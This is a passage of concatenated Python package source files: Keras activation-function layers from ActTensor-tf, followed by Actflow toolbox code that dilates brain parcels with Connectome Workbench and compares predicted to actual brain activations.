def call(self, inputs, mask=None):
return colu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class PELU(tf.keras.layers.Layer):
def __init__(self, c, b, alpha, **kwargs):
"""
Parametric Exponential Linear Unit Activation Layer
Parameters
----------
alpha : int, float
c : int, float
b : int, float
"""
super(PELU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
self.b = b
self.c = c
def build(self, input_shape):
super(PELU, self).build(input_shape)
def call(self, inputs, mask=None):
return pelu(inputs, self.c, self.b,self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class SELU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
SELU Activation Layer
"""
super(SELU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SELU, self).build(input_shape)
def call(self, inputs, mask=None):
return selu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class CELU(tf.keras.layers.Layer):
def __init__(self, alpha=1.0, **kwargs):
"""
CELU Activation Layer
Parameters
----------
alpha : int, float, default=1.0
"""
super(CELU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(CELU, self).build(input_shape)
def call(self, inputs, mask=None):
return celu(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class ArcTan(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
        ArcTan (arctangent) Activation Layer
"""
super(ArcTan, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ArcTan, self).build(input_shape)
def call(self, inputs, mask=None):
return arcTan(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ShiftedSoftPlus(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Shifted Softplus Activation Layer
"""
super(ShiftedSoftPlus, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ShiftedSoftPlus, self).build(input_shape)
def call(self, inputs, mask=None):
return Shifted_SoftPlus(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Softmax(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Softmax Activation Layer
"""
super(Softmax, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Softmax, self).build(input_shape)
def call(self, inputs, mask=None):
return softmax(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Logit(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Logit Activation Layer
"""
super(Logit, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Logit, self).build(input_shape)
def call(self, inputs, mask=None):
return logit(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class GELU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Gaussian Error Linear Unit Activation Layer
"""
super(GELU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(GELU, self).build(input_shape)
def call(self, inputs, mask=None):
return gelu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Softsign(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Softsign Activation Layer
"""
super(Softsign, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Softsign, self).build(input_shape)
def call(self, inputs, mask=None):
return softsign(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ELiSH(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Exponential Linear Squashing Activation Layer
"""
super(ELiSH, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ELiSH, self).build(input_shape)
def call(self, inputs, mask=None):
return elish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class HardELiSH(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Exponential Linear Squashing Activation Layer
"""
super(HardELiSH, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardELiSH, self).build(input_shape)
def call(self, inputs, mask=None):
return hardELiSH(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Serf(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Log-Softplus Error Activation Layer
"""
super(Serf, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Serf, self).build(input_shape)
def call(self, inputs, mask=None):
return serf(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ELU(tf.keras.layers.Layer):
def __init__(self, alpha, **kwargs):
"""
Exponential Linear Unit Activation Layer
Parameters
----------
alpha : int,float
"""
super(ELU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(ELU, self).build(input_shape)
def call(self, inputs, mask=None):
return elu(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class Phish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Phish Activation Layer
"""
super(Phish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Phish, self).build(input_shape)
def call(self, inputs, mask=None):
return phish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class QReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Quantum Rectifier Linear Unit Activation Layer
"""
super(QReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(QReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return qrelu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class MQReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
modified QReLU Activation Layer
"""
super(MQReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(MQReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return mqrelu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class FReLU(tf.keras.layers.Layer):
def __init__(self, b, **kwargs):
"""
Flexible Rectified Linear Unit Activation Layer
Parameters
----------
b : int, float
"""
super(FReLU, self).__init__(**kwargs)
self.supports_masking = True
self.b = b
def build(self, input_shape):
super(FReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return frelu(inputs, self.b)
def compute_output_shape(self, input_shape):
return input_shape | ActTensor-tf | /ActTensor_tf-1.0.tar.gz/ActTensor_tf-1.0.0/ActTensor_tf/activations.py | activations.py |
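# Illustrative usage sketch: the layers above can be dropped into a Keras model
# like any built-in activation layer (assumes the `mish` and `swish` helper
# functions referenced by these layers are defined earlier in this module).
def _demo_layers_in_model():
    """Minimal sketch: a tiny Sequential model mixing several custom layers."""
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(16, input_shape=(8,)),
        Mish(),
        tf.keras.layers.Dense(16),
        Swish(beta=1.0),
        tf.keras.layers.Dense(1),
    ])
    return model(tf.random.normal((2, 8)))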
import numpy as np
import nibabel as nib
import pkg_resources
import os
## global variables for directories and atlas information
# CAB-NP directory
partitiondir = pkg_resources.resource_filename('ActflowToolbox.dependencies', 'ColeAnticevicNetPartition/')
# label file
defaultdlabelfile = partitiondir + 'CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
# surface file
leftSurface = partitiondir + 'S1200.L.inflated_MSMAll.32k_fs_LR.surf.gii'
rightSurface = partitiondir + 'S1200.R.inflated_MSMAll.32k_fs_LR.surf.gii'
# output cortex file directory
dilatedmaskdir_cortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'Glasser2016/surfaceMasks/')
# output subcortex file directory
dilatedmaskdir_subcortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/volumeMasks/')
def dilateParcels(dilateMM=10,verbose=True):
'''
This script dilates individual parcels by x mm
Purpose is to use this as a mask to exclude any vertices within 10mm
    of a parcel when estimating FC via either ridge or multiple linear regression.
Dilates all parcels (cortex and subcortex)
Requires connectome workbench
PARAMETERS:
dilateMM : dilation in mm (default=10)
verbose : prints current roi
'''
    dlabels = np.squeeze(nib.load(defaultdlabelfile).get_fdata())
parcel_list = np.unique(dlabels)
for parcel in parcel_list:
if verbose:
            print('Dilating parcel', int(parcel))
        parcel_array = np.zeros(dlabels.shape)
        # Find all vertices that correspond to this ROI
        roi_ind = np.where(dlabels==parcel)[0]
        parcel_array[roi_ind] = 1.0
        if parcel < 361:
            maskfile = dilatedmaskdir_cortex + 'GlasserParcel' + str(int(parcel))
            dilatedfile = dilatedmaskdir_cortex + 'GlasserParcel' + str(int(parcel)) + '_dilated_' + str(dilateMM) + 'mm'
        else:
            maskfile = dilatedmaskdir_subcortex + 'CabnpParcel' + str(int(parcel))
            dilatedfile = dilatedmaskdir_subcortex + 'CabnpParcel' + str(int(parcel)) + '_dilated_' + str(dilateMM) + 'mm'
# Write out masks to a dscalar file
np.savetxt(maskfile + '.csv', parcel_array, fmt='%s')
# Specify output of ROI specific mask and workbench commands
wb_command = 'wb_command -cifti-convert -from-text ' + maskfile + '.csv ' + defaultdlabelfile + ' ' + maskfile + '.dscalar.nii -reset-scalars'
os.system(wb_command)
# Now dilate masks
wb_command = 'wb_command -cifti-dilate ' + maskfile + '.dscalar.nii COLUMN ' + str(dilateMM) + ' ' + str(dilateMM) + ' ' + dilatedfile + '.dscalar.nii -left-surface ' + leftSurface + ' -right-surface ' + rightSurface
os.system(wb_command)
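# Illustrative usage sketch: calling with a different dilation (e.g. 5 mm) writes
# masks such as 'GlasserParcel<N>_dilated_5mm.dscalar.nii' (cortex) and
# 'CabnpParcel<N>_dilated_5mm.dscalar.nii' (subcortex) into the mask directories
# defined above; Connectome Workbench ('wb_command') must be on the PATH.
# Example call (commented out to avoid side effects on import):
# dilateParcels(dilateMM=5, verbose=False)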
if __name__ == '__main__':
# default settings
dilateParcels(dilateMM=10,verbose=True) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/network_definitions/dilateParcels.py | dilateParcels.py |
import numpy as np
import scipy.stats
import sklearn
import sklearn.metrics
def model_compare_predicted_to_actual(target_actvect, pred_actvect, comparison_type='conditionwise_compthenavg'):
    """Compare predicted to actual activations using the requested comparison scheme.

    target_actvect and pred_actvect are node x condition x subject NumPy arrays.
    comparison_type is one of 'fullcompare_compthenavg', 'conditionwise_compthenavg',
    'conditionwise_avgthencomp', 'nodewise_compthenavg', or 'nodewise_avgthencomp'.
    Returns a dictionary of Pearson r, R^2, and mean absolute error values
    (the exact keys depend on the comparison type).
    """
    nNodes=np.shape(target_actvect)[0]
    nConds=np.shape(target_actvect)[1]
    nSubjs=np.shape(target_actvect)[2]
## fullcompare_compthenavg - Compare-then-average across all conditions and all nodes between predicted and actual activations
if comparison_type=='fullcompare_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
corr_fullcomp_compthenavg = [np.corrcoef(target_actvect[:,:,subjNum].flatten(),pred_actvect[:,:,subjNum].flatten())[0,1] for subjNum in range(nSubjs)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_fullcomp_compthenavg = [sklearn.metrics.r2_score(target_actvect[:,:,subjNum].flatten(),pred_actvect[:,:,subjNum].flatten()) for subjNum in range(nSubjs)]
#mean_absolute_error: compute the absolute mean error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_fullcomp_compthenavg = [np.nanmean(np.abs(np.subtract(target_actvect[:,:,subjNum].flatten(),pred_actvect[:,:,subjNum].flatten()))) for subjNum in range(nSubjs)]
output = {'corr_vals':corr_fullcomp_compthenavg,'R2_vals':R2_fullcomp_compthenavg,'mae_vals':maeAcc_fullcomp_compthenavg}
## conditionwise_compthenavg - Compare-then-average condition-wise correlation between predicted and actual activations
if comparison_type=='conditionwise_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
corr_conditionwise_compthenavg_bynode = [[np.corrcoef(target_actvect[nodeNum,:,subjNum],pred_actvect[nodeNum,:,subjNum])[0,1] for subjNum in range(nSubjs)] for nodeNum in range(nNodes)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_conditionwise_compthenavg_bynode = [[sklearn.metrics.r2_score(target_actvect[nodeNum,:,subjNum],pred_actvect[nodeNum,:,subjNum]) for subjNum in range(nSubjs)] for nodeNum in range(nNodes)]
        ## mean_absolute_error: compute the mean absolute error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_bynode_compthenavg = [[np.nanmean(np.abs(np.subtract(target_actvect[nodeNum,:,subjNum],pred_actvect[nodeNum,:,subjNum]))) for subjNum in range(nSubjs)] for nodeNum in range(nNodes)]
output = {'corr_vals':corr_conditionwise_compthenavg_bynode,'R2_vals':R2_conditionwise_compthenavg_bynode,'mae_vals':maeAcc_bynode_compthenavg}
## conditionwise_avgthencomp - Average-then-compare condition-wise correlation between predicted and actual activations
if comparison_type=='conditionwise_avgthencomp':
corr_conditionwise_avgthencomp_bynode=[np.corrcoef(np.nanmean(target_actvect[nodeNum,:,:],axis=1),np.nanmean(pred_actvect[nodeNum,:,:],axis=1))[0,1] for nodeNum in range(nNodes)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_conditionwise_avgthencomp_bynode = [sklearn.metrics.r2_score(np.nanmean(target_actvect[nodeNum,:,:],axis=1),np.nanmean(pred_actvect[nodeNum,:,:],axis=1)) for nodeNum in range(nNodes)]
        ## mean_absolute_error: compute the mean absolute error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_bynode_avgthencomp =[np.nanmean(np.abs(np.subtract(np.nanmean(target_actvect[nodeNum,:,:],axis=1),np.nanmean(pred_actvect[nodeNum,:,:],axis=1)))) for nodeNum in range(nNodes)]
output = {'corr_conditionwise_avgthencomp_bynode':corr_conditionwise_avgthencomp_bynode,'R2_conditionwise_avgthencomp_bynode':R2_conditionwise_avgthencomp_bynode,'maeAcc_bynode_avgthencomp':maeAcc_bynode_avgthencomp}
## nodewise_compthenavg - Compare-then-average cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if comparison_type=='nodewise_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
corr_nodewise_compthenavg_bycond=[[np.corrcoef(target_actvect[:,taskNum,subjNum], pred_actvect[:,taskNum,subjNum])[0,1] for subjNum in range(nSubjs)] for taskNum in range(nConds)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_nodewise_compthenavg_bycond = [[sklearn.metrics.r2_score(target_actvect[:,taskNum,subjNum], pred_actvect[:,taskNum,subjNum]) for subjNum in range(nSubjs)] for taskNum in range(nConds)]
        ## mean_absolute_error: compute the mean absolute error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_nodewise_compthenavg_bycond = [[np.nanmean(np.abs(np.subtract(target_actvect[:,taskNum,subjNum], pred_actvect[:,taskNum,subjNum]))) for subjNum in range(nSubjs)] for taskNum in range(nConds)]
output = {'corr_vals':corr_nodewise_compthenavg_bycond,'R2_vals':R2_nodewise_compthenavg_bycond,'mae_vals':maeAcc_nodewise_compthenavg_bycond}
## nodewise_avgthencomp - Average-then-compare cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if comparison_type == 'nodewise_avgthencomp':
#Test for accuracy of actflow prediction, averaging across subjects before comparing ("average-then-compare")
corr_nodewise_avgthencomp_bycond=[np.corrcoef(np.nanmean(target_actvect[:,taskNum,:],axis=1),np.nanmean(pred_actvect[:,taskNum,:],axis=1))[0,1] for taskNum in range(nConds)]
output = {'corr_nodewise_avgthencomp_bycond':corr_nodewise_avgthencomp_bycond}
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_nodewise_avgthencomp_bycond = [sklearn.metrics.r2_score(np.nanmean(target_actvect[:,taskNum,:],axis=1),np.nanmean(pred_actvect[:,taskNum,:],axis=1)) for taskNum in range(nConds)]
        ## mean_absolute_error: compute the mean absolute error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_nodewise_avgthencomp_bycond = [np.nanmean(np.abs(np.subtract(np.nanmean(target_actvect[:,taskNum,:],axis=1),np.nanmean(pred_actvect[:,taskNum,:],axis=1)))) for taskNum in range(nConds)]
output = {'corr_nodewise_avgthencomp_bycond':corr_nodewise_avgthencomp_bycond,'R2_nodewise_avgthencomp_bycond':R2_nodewise_avgthencomp_bycond,'maeAcc_nodewise_avgthencomp_bycond':maeAcc_nodewise_avgthencomp_bycond}
return output | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/model_compare/model_compare_predicted_to_actual.py | model_compare_predicted_to_actual.py |
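# Illustrative usage sketch: running the comparison on small synthetic arrays
# shaped node x condition x subject (the shapes and noise level below are
# arbitrary, chosen only for demonstration).
def _demo_model_compare_predicted_to_actual():
    """Minimal sketch: condition-wise compare-then-average on synthetic data."""
    rng = np.random.default_rng(0)
    target = rng.standard_normal((10, 4, 3))            # 10 nodes, 4 conditions, 3 subjects
    predicted = target + 0.1 * rng.standard_normal((10, 4, 3))
    return model_compare_predicted_to_actual(target, predicted,
                                             comparison_type='conditionwise_compthenavg')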
import numpy as np
import scipy.stats
from .model_compare_predicted_to_actual import *
def model_compare(target_actvect, model1_actvect, model2_actvect=None, full_report=False, print_report=True, print_by_condition=True, comparison_type='fullcompare_compthenavg', avgthencomp_fixedeffects=False, mean_absolute_error=True):
"""
Function to compare prediction accuracies between models. If model2_actvect=None then the predictions are compared against a simple null model (e.g., r=0 for Pearson correlation). Note that this function cannot yet handle time series prediction testing.
INPUTS
target_actvect: node x condition x subject NumPy array, consisting of the to-be-predicted values the model predictions will be compared to. This should be a vector of activity values for each node (separately for each condition).
model1_actvect: node x condition x subject NumPy array, consisting of Model 1's predicted values. This should be a vector of activity values for each node (separately for each condition).
model2_actvect: Optional. A node x condition x subject NumPy array, consisting of Model 2's predicted values. This should be a vector of activity values for each node (separately for each condition).
full_report: Calculate full report with all comparison types
print_report: Print the model comparison report to screen
print_by_condition: Print the model comparison report for each condition separately (only works if print_report is also True)
comparison_type: The kind of comparison to calculate (when full_report=False). Options are:
fullcompare_compthenavg – Compare-then-average correlation between predicted and actual activations across all conditions and nodes simultaneously. Variance between conditions and between nodes are treated equally via collapsing the data across those dimensions (e.g., 2 conditions across 360 nodes = 720 values). The comparisons are computed separately for each subject, then results are summarized via averaging.
conditionwise_compthenavg - Compare-then-average condition-wise correlation between predicted and actual activations. This is run separately for each node, computing the correlation between the activations across conditions (which characterizes each node's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging.
conditionwise_avgthencomp - Average-then-compare condition-wise correlation between predicted and actual activations. This is run separately for each node, computing the correlation between the cross-condition activation patterns (which characterizes each node's response profile). Activations are averaged across subjects prior to comparison (sometimes called a "fixed effects" analysis), boosting signal-to-noise ratio but likely reducing dimensionality (through inter-subject averaging) and reducing the ability to assess the consistency of the result across subjects relative to compare-then-average.
nodewise_compthenavg - Compare-then-average cross-node correlation between predicted and actual activations (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging (sometimes called a "random effects" analysis).
nodewise_avgthencomp - Average-then-compare cross-node correlation between predicted and actual activations (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed after averaging across subjects (sometimes called a "fixed effects" analysis).
[TODO: subjwise_compthenavg (each node & condition based on individual differences)]
avgthencomp_fixedeffects (default = False): if True, compute prediction accuracies after averaging across subjects (sometimes called a "fixed effects" analysis). This is set to False by default because it is generally best practice to run analyses with subject as a random effect, which helps generalize results to held-out data and provides p-values for estimating statistical confidence in the observed effect.
    mean_absolute_error: if True, compute the mean absolute error: mean(abs(a-p)), where a are the actual activations
        and p the predicted activations across all the nodes.
OUTPUT
output: a dictionary containing the following variables, depending on user input for full_report & reliability_type.
When full_report=True: output contains variables for all reliability_type runs.
For model2_actvect is None, these variables are:
conditionwise_compthenavg_output
corr_conditionwise_compthenavg_bynode
R2_conditionwise_compthenavg_bynode
nodewise_compthenavg_output
corr_nodewise_compthenavg_bycond
For when mean_absolute_error == True, these variables also include:
maeAcc_bynode_compthenavg
For when avgthencomp_fixedeffects == True, these variables also include:
conditionwise_avgthencomp_output
corr_conditionwise_avgthencomp_bynode
nodewise_avgthencomp_output
corr_nodewise_avgthencomp_bycond
For when model2_actvect is not None, these variables also include:
conditionwise_compthenavg_output_model2
corr_conditionwise_compthenavg_bynode_model2
R2_conditionwise_compthenavg_bynode_model2
nodewise_compthenavg_output_model2
corr_nodewise_compthenavg_bycond_model2
For when mean_absolute_error == True and model2_actvect is not None, these variables also include:
maeAcc_bynode_compthenavg_model2
For when avgthencomp_fixedeffects == True, these variables also include:
conditionwise_avgthencomp_output_model2
corr_conditionwise_avgthencomp_bynode_model2
nodewise_avgthencomp_output_model2
corr_nodewise_avgthencomp_bycond_model2
"""
nNodes=np.shape(target_actvect)[0]
nConds=np.shape(target_actvect)[1]
nSubjs=np.shape(target_actvect)[2]
scaling_note = "Note: Pearson r and Pearson r^2 are scale-invariant, while R^2 and MAE are not. R^2 units: percentage of the to-be-predicted data's unscaled variance, ranging from negative infinity (because prediction errors can be arbitrarily large) to positive 1. See https://scikit-learn.org/stable/modules/generated/sklearn.metrics.r2_score.html for more info."
output = {}
if print_report:
print("===Comparing prediction accuracies between models (similarity between predicted and actual brain activation patterns)===")
### Full comparison (condition-wise and node-wise combined) analyses
## fullcompare_compthenavg - Compare-then-average across all conditions and all nodes between predicted and actual activations
if full_report or comparison_type=='fullcompare_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
fullcomp_compthenavg_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='fullcompare_compthenavg')
#Add to output dictionary
output.update({'fullcomp_compthenavg_output':fullcomp_compthenavg_output,
'corr_fullcomp_compthenavg':fullcomp_compthenavg_output['corr_vals'],
'R2_fullcomp_compthenavg':fullcomp_compthenavg_output['R2_vals'],
'maeAcc_fullcomp_compthenavg':fullcomp_compthenavg_output['mae_vals']})
if model2_actvect is None:
## Test against null model
#Grand mean (across task) t-test
[tval_ActflowPredAcc_fullcomp,pval_ActflowPredAcc_fullcomp] = scipy.stats.ttest_1samp(np.ma.arctanh(fullcomp_compthenavg_output['corr_vals']),0.0)
#Add to output dictionary
output.update({'tval_ActflowPredAcc_fullcomp':tval_ActflowPredAcc_fullcomp,
'pval_ActflowPredAcc_fullcomp':pval_ActflowPredAcc_fullcomp})
else:
## Test model1 vs. model2 prediction accuracy
# Test for accuracy of MODEL2 actflow prediction, separately for each subject ("compare-then-average")
fullcomp_compthenavg_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='fullcompare_compthenavg')
#Grand mean (across task) t-test, model1 vs. model2 prediction accuracy
model1_means = np.ma.arctanh(fullcomp_compthenavg_output['corr_vals'])
model2_means = np.ma.arctanh(fullcomp_compthenavg_output_model2['corr_vals'])
[tval_ActflowPredAcc_corr_fullcomp_modelcomp,pval_ActflowPredAcc_corr_fullcomp_modelcomp] = scipy.stats.ttest_1samp(np.subtract(model1_means,model2_means),0.0)
#Add to output dictionary
output.update({'fullcomp_compthenavg_output_model2':fullcomp_compthenavg_output_model2,
'corr_fullcomp_compthenavg_model2':fullcomp_compthenavg_output_model2['corr_vals'],
'R2_fullcomp_compthenavg_model2':fullcomp_compthenavg_output_model2['R2_vals'],
'maeAcc_fullcomp_compthenavg_model2':fullcomp_compthenavg_output_model2['mae_vals'],
'tval_ActflowPredAcc_corr_fullcomp_modelcomp':tval_ActflowPredAcc_corr_fullcomp_modelcomp,
'pval_ActflowPredAcc_corr_fullcomp_modelcomp':pval_ActflowPredAcc_corr_fullcomp_modelcomp})
if print_report:
print(" ")
print("==Comparisons between predicted and actual activation patterns, across all conditions and nodes:==")
print("--Compare-then-average (calculating prediction accuracies before cross-subject averaging):")
print("Each comparison based on " + str(nConds) + " conditions across " + str(nNodes) + " nodes, p-values based on " + str(nSubjs) + " subjects (cross-subject variance in comparisons)")
if model2_actvect is None:
print_comparison_results(fullcomp_compthenavg_output, None, tval_ActflowPredAcc_fullcomp, pval_ActflowPredAcc_fullcomp, scaling_note=scaling_note)
else:
print_comparison_results(fullcomp_compthenavg_output, fullcomp_compthenavg_output_model2, tval_ActflowPredAcc_corr_fullcomp_modelcomp, pval_ActflowPredAcc_corr_fullcomp_modelcomp, scaling_note=scaling_note)
### Condition-wise analyses (as opposed to node-wise)
## conditionwise_compthenavg - Compare-then-average condition-wise correlation between predicted and actual activations (only if more than one task condition)
if full_report or comparison_type=='conditionwise_compthenavg':
if nConds == 1:
print("WARNING: Condition-wise calculations cannot be performed with only a single condition")
else:
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
conditionwise_compthenavg_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='conditionwise_compthenavg')
#Add to output dictionary
output.update({'conditionwise_compthenavg_output':conditionwise_compthenavg_output,
'corr_conditionwise_compthenavg_bynode':conditionwise_compthenavg_output['corr_vals'],
'R2_conditionwise_compthenavg_bynode':conditionwise_compthenavg_output['R2_vals'],
'mae_conditionwise_compthenavg_bynode':conditionwise_compthenavg_output['mae_vals']})
if model2_actvect is None:
## Test against null model
#Grand mean (across task) t-test
[tval_ActflowPredAcc_nodemean,pval_ActflowPredAcc_nodemean] = scipy.stats.ttest_1samp(np.nanmean(np.ma.arctanh(conditionwise_compthenavg_output['corr_vals']),axis=0),0.0)
else:
## Test model1 vs. model2 prediction accuracy
# Test for accuracy of MODEL2 actflow prediction, separately for each subject ("compare-then-average")
conditionwise_compthenavg_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='conditionwise_compthenavg')
#Grand mean (across task) t-test, model1 vs. model2 prediction accuracy
model1_means = np.nanmean(np.ma.arctanh(conditionwise_compthenavg_output['corr_vals']),axis=0)
model2_means = np.nanmean(np.ma.arctanh(conditionwise_compthenavg_output_model2['corr_vals']),axis=0)
[tval_ActflowPredAcc_nodemean,pval_ActflowPredAcc_nodemean] = scipy.stats.ttest_1samp(np.subtract(model1_means,model2_means),0.0)
#Add to output dictionary
output.update({'conditionwise_compthenavg_output_model2':conditionwise_compthenavg_output_model2,
'corr_conditionwise_compthenavg_bynode_model2':conditionwise_compthenavg_output_model2['corr_vals'],
'R2_conditionwise_compthenavg_bynode_model2':conditionwise_compthenavg_output_model2['R2_vals'],
'mae_conditionwise_compthenavg_bynode_model2':conditionwise_compthenavg_output_model2['mae_vals']})
if print_report:
print(" ")
print("==Condition-wise comparisons between predicted and actual activation patterns (calculated for each node separetely):==")
print("--Compare-then-average (calculating prediction accuracies before cross-subject averaging):")
print("Each correlation based on N conditions: " + str(nConds) + ", p-values based on N subjects (cross-subject variance in correlations): " + str(nSubjs))
if model2_actvect is None:
print_comparison_results(conditionwise_compthenavg_output, None, tval_ActflowPredAcc_nodemean, pval_ActflowPredAcc_nodemean, scaling_note=scaling_note)
else:
print_comparison_results(conditionwise_compthenavg_output, conditionwise_compthenavg_output_model2, tval_ActflowPredAcc_nodemean, pval_ActflowPredAcc_nodemean, scaling_note=scaling_note)
## conditionwise_avgthencomp - Average-then-compare condition-wise correlation between predicted and actual activations (only if more than one task condition)
if avgthencomp_fixedeffects or comparison_type=='conditionwise_avgthencomp':
if nConds == 1:
print("WARNING: Condition-wise calculations cannot be performed with only a single condition")
else:
#Test for accuracy of actflow prediction, separately for each subject ("average-then-compare")
conditionwise_avgthencomp_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='conditionwise_avgthencomp')
corr_conditionwise_avgthencomp_bynode = conditionwise_avgthencomp_output['corr_conditionwise_avgthencomp_bynode']
#Add to output dictionary
output.update({'conditionwise_avgthencomp_output':conditionwise_avgthencomp_output, 'corr_conditionwise_avgthencomp_bynode':corr_conditionwise_avgthencomp_bynode})
if model2_actvect is not None:
# Test for accuracy of MODEL2 actflow prediction, after averaging across subjects ("average-then-compare")
conditionwise_avgthencomp_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='conditionwise_avgthencomp')
corr_conditionwise_avgthencomp_bynode_model2 = conditionwise_avgthencomp_output_model2['corr_conditionwise_avgthencomp_bynode']
#Add to output dictionary
output.update({'conditionwise_avgthencomp_output_model2':conditionwise_avgthencomp_output_model2, 'corr_conditionwise_avgthencomp_bynode_model2':corr_conditionwise_avgthencomp_bynode_model2})
if print_report:
print(" ")
print("==Condition-wise correlations between predicted and actual activation patterns (calculated for each node separetely):==")
print("--Average-then-compare (calculating prediction accuracies after cross-subject averaging):")
print("Each correlation based on N conditions: " + str(nConds))
if model2_actvect is None:
print("Mean Pearson r=" + str("%.2f" % np.tanh(np.nanmean(np.ma.arctanh(corr_conditionwise_avgthencomp_bynode)))))
else:
meanRModel1=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_conditionwise_avgthencomp_bynode))))
print("Model1 Mean Pearson r=" + str("%.2f" % meanRModel1))
meanRModel2=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_conditionwise_avgthencomp_bynode_model2))))
print("Model2 Mean Pearson r=" + str("%.2f" % meanRModel2))
meanRModelDiff=meanRModel1-meanRModel2
print("R-value difference = " + str("%.2f" % meanRModelDiff))
if mean_absolute_error:
maeAcc_bynode_avgthencomp = conditionwise_avgthencomp_output['maeAcc_bynode_avgthencomp']
#Add to output dictionary
output.update({'maeAcc_bynode_avgthencomp':maeAcc_bynode_avgthencomp})
if print_report:
print(" ")
print("==Condition-wise Mean Absolute Error (MAE) between predicted and actual activation patterns (calculated for each node separateley):==")
print("--Average-then-compare (calculating MAE accuracies after cross-subject averaging):")
print("Each MAE based on N conditions: " + str(nConds))
print("Mean MAE=" + str("%.2f" % np.nanmean(maeAcc_bynode_avgthencomp)))
### Node-wise analyses (as opposed to condition-wise)
